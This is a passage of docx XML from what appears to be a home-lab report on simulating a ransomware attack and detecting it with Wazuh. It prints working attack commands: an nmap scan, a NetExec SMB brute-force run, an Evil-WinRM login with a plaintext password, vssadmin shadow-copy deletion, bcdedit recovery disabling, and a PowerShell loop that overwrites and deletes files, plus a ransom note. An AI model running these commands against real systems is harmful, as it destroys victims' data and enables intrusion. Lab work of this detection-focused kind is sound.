              <w:t xml:space="preserve">File added to the system</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Creation of</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.docx.locked</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">files and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">README_HOW_TO_RECOVER.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">T1486</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(Data Encrypted for Impact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_4a05abc72f21ee9c74d914b09459978302a6ad8"/>
      <w:r>
        <w:t xml:space="preserve">5. Chronological Attack Simulation &amp; SIEM Detection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_f4ce561b1b05101133d7310d6c00ec05bb33929"/>
      <w:r>
        <w:t xml:space="preserve">Phase 1: Network Reconnaissance (T1046)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From Kali Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), an Nmap scan probed the target Windows Server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.103</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-Pn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 135,139,445,3389,5985 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1003"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Findings:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Identified Port 135 (MSRPC), Port 139 (NetBIOS), Port 445 (SMB), and Port 5985 (WinRM) as open and reachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.1: Nmap Network Reconnaissance from Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3692769"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Reconnaissance" title="" id="51" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_1_reconnaissance.png" id="52" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3692769"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId53">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_2f23ca65cbd59ba0acbf487f2502385fcb16f5d"/>
      <w:r>
        <w:t xml:space="preserve">Phase 2: Credential Access &amp; Password Spraying (T1110)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adversary simulated SMB brute-forcing using</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(NetExec) from Kali Linux (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nxc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> smb 192.168.56.103 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/share/wordlists/metasploit/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.2: SMB Brute-Force Password Spray from Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3351268"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Brute Force Attack" title="" id="56" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_2_brute_force.png" id="57" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3351268"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId58">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_c129835a750acc6cd0b37afc71cfabc1a91c02b"/>
      <w:r>
        <w:t xml:space="preserve">SIEM Telemetry &amp; Detection:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wazuh captured multiple failed logon events (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Security Event ID 4625 / Rule 60122</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The alert payload recorded the caller IP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.56.102</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), target user (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), and workstation name (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">KALI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.3: Wazuh Event Log Confirming Brute-Force Telemetry &amp; Attacker IP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3088105"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Bruteforce Logged" title="" id="61" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:/Users/Mohammad%20Hasnain%20Ali/.gemini/antigravity/brain/3d9cdba9-39e5-4703-9fe0-f854654f4ef8/fig_5_3_bruteforce_logged.png" id="62" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3088105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ðŸ”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Open High-Resolution Image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_933c126ee1252807302f15f6b56765c32d03548"/>
      <w:r>
        <w:t xml:space="preserve">Phase 3: Lateral Movement &amp; Ransomware Execution (T1021.006 &amp; T1490)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using compromised administrative credentials, the adversary established an interactive remote shell via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evil-WinRM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">over Port 5985:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">evil-winrm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.103 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Eren@1483'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Within the remote session, the attacker executed commands to delete Volume Shadow Copies, disable startup recovery, mass-encrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Finance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and drop an extortion note:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">vssadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> delete shadows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">quiet</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bcdedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{default}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> recoveryenabled No</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bcdedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'{default}'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bootstatuspolicy ignoreallfailures</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Mass Encryption Loop</w:t>
      </w:r>
      <w:r>
        <w:br/>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"C:\Finance"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter </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$bytes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ReadAllBytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">FullName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$b64</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Convert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]::</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ToBase64String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$bytes</w:t>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WriteAllText</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">".locked"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$b64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Remove-Item</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$_</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"[X] Encrypted: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"C:\Finance\README_HOW_TO_RECOVER.txt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Value </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"YOUR DATA HAS BEEN ENCRYPTED BY KALI ATTACKER. CONTACT FOR DECRYPTION."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5.4: Live Ransomware Execution inside Evil-WinRM Remote Shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3204847"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Ransomware Attack" title="" id="66" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
